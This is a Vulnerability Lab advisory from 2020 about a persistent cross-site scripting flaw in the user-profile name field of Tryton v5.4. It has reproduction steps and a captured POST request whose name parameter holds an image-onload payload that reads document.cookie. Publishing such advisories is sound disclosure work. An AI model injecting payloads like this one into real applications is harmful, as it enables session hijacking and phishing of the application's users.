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Tryton v5.4 - (Name) Persistent Cross Site Vulnerability
References (Source):
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https://www.vulnerability-lab.com/get_content.php?id=2233
Release Date:
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2020-05-12
Vulnerability Laboratory ID (VL-ID):
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2233
Common Vulnerability Scoring System:
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4.4
Vulnerability Class:
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Cross Site Scripting - Persistent
Current Estimated Price:
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500€ - 1.000€
Product & Service Introduction:
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Tryton is business software, ideal for companies of any size, easy
to
use, complete and 100% Open Source. Tryton has
a Three-tier architecture. It is composed of an application server
which
connects to a PostgreSQL database, a web or
desktop client for the presentation and a set of server modules for
the
business logic. A docker container that comes
pre-installed with the server, modules and web client. This is a
very
simple way of locally installing and exploring
the application. It is also production ready for easy deployment.
These
images are updated every week.We also publish
an optional add-on that can be used to manage timesheets from
inside
your browser. All the packages are also published
on the Python Package Index. Available for os - arch linux,
debian,
fedora, gentoo, openbsd, ubuntu & netbsd.
(Copy of the Homepage: https://www.tryton.org/ &
https://www.tryton.org/download )
Abstract Advisory Information:
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The vulnerability laboratory core research team discovered a
persistent
cross site web vulnerability in the Tryton v5.4.
Affected Product(s):
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Tryton Foundation
Product: Tryton v5.4 - CMS (Web-Application)
Vulnerability Disclosure Timeline:
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2020-05-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
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Published
Exploitation Technique:
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Remote
Severity Level:
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Medium
Authentication Type:
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Restricted authentication (user/moderator) - User privileges
User Interaction:
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Low User Interaction
Disclosure Type:
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Independent Security Research
Technical Details & Description:
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A persistent input validation web vulnerability has been discovered
in
the official Tryton v5.4 web-application series.
The vulnerability allows remote attackers to inject own malicious
script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the `name` parameter
of the
`User Profile` module. Remote attackers with low
privileges are able to inject own malicious persistent script code
as
name for user accounts. The injected code can be
used to attack the frontend or backend of the web-application.
The
request method to inject is POST and the attack vector
is located on the application-side. Injection point is the profile
input
field with the name value and the execute occurs
in the front ui on top right were the avatar is listed or in the
admin
backend on the res.user;name="Users"&views.
Successful exploitation of the vulnerabilities results in
session
hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation
of
affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] User Profile
Vulnerable Input(s):
[+] Name
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] /index
[+] /model/res.user;name="Users"&views (backend)
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged
web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow
the
provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the application and login to your low privileged user
account
2. Move to the profile on top right side (click)
3. Inject test payload to the "Name" input field and save the
entry
4. Execution occurs after save on top right and
/model/res.user;name="Users"&views of the admin backend
5. Successful reproduce of the persistent cross site
vulnerability!
PoC: Payload
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PoC: Vulnerable Source (Execution Point)
<div class="input-group input-group-sm"><span
class="input-group-btn"><button type="button" class="btn
btn-default">Filters</button></span>
<input class="form-control mousetrap" placeholder="Search"
autocomplete="off" list="ui-id-3"><datalist
id="ui-id-3"></datalist>
<span class="input-group-btn"><button type="button"
class="btn
btn-default hidden-md hidden-lg" aria-label="Clear Search"
title="Clear Search" style="display: none;"><img
class="icon"
src="blob:https://demo5.4.tryton.org/4672612e-3ec6-4bd1-aa4d-bd379bd89c04"></button>
<button type="submit" class="btn btn-default"
aria-label="Search"
title="Search"><img class="icon"
src="blob:https://demo5.4.tryton.org/ab0d098c-1302-4ffa-8f27-3204fb244082"></button><button
class="btn btn-default hidden-xs"
type="button" title="Bookmark this filter" aria-label="Bookmark
this
filter"><img class="icon" aria-hidden="true"
src="blob:https://demo5.4.tryton.org/d97b8af2-ca4b-48e2-a40e-a772955d7ea8"></button><button
type="button" class="btn btn-default
dropdown-toggle" data-toggle="dropdown" aria-expanded="false"
aria-label="Bookmarks" title="Bookmarks" id="bookmarks"
disabled="">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/c9b2efdd-1ec8-4785-b7a0-d3b8dcb6d7e9"></button>
<ul class="dropdown-menu dropdown-menu-right" role="menu"
aria-labelledby="bookmarks"></ul><button
type="button"
class="btn btn-default hidden-xs" aria-expanded="false"
aria-label="Show
inactive records" title="Show inactive records">
<img aria-hidden="true" class="icon"
src="blob:https://demo5.4.tryton.org/6ad6ad9c-4d17-4592-9e3c-6f698b6f9a27"></button></span></div>
--- PoC Session Logs [POST] ---
https://tryton.localhost:8080/tryton/
Host: tryton.localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Session
ZGVtbzoyOjMyYmIyOWE3ODYxMzA3NGVkZThlMDBhNmEyMWVkNzFhZTAxOGQwMzA1YTJhMGU1NTNjOWU2YTNhZWM5MzA1MzM=
X-Requested-With: XMLHttpRequest
Content-Length: 527
Origin: https://tryton.localhost:8080
Connection: keep-alive
Referer: https://tryton.localhost:8080/
{"id":195,"method":"model.res.user.set_preferences","params":[{"name":"%20>"><img%20src="evil.source%20onload=alert(document.cookie)>">",
"signature":"test
signature"},{"client":"1aab6de2-1f59-43de-b0d0-a8319558e4e8","warehouse":null,"employee":null,"company":1,
"company.rec_name":"Michael Scott Paper
Company","language":"en","language_direction":"ltr","groups":[5,15,16,13,19,20,17,9,10],
"locale":{"date":"%m/%d/%Y","grouping":[3,3,0],"decimal_point":".","thousands_sep":","},"company_work_time":
{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}
-
POST: HTTP/2.0 200 OK
server: nginx/1.16.1
content-type: application/json
access-control-allow-origin: https://tryton.localhost:8080
vary: Origin
content-encoding: gzip
Credits & Authors:
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Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
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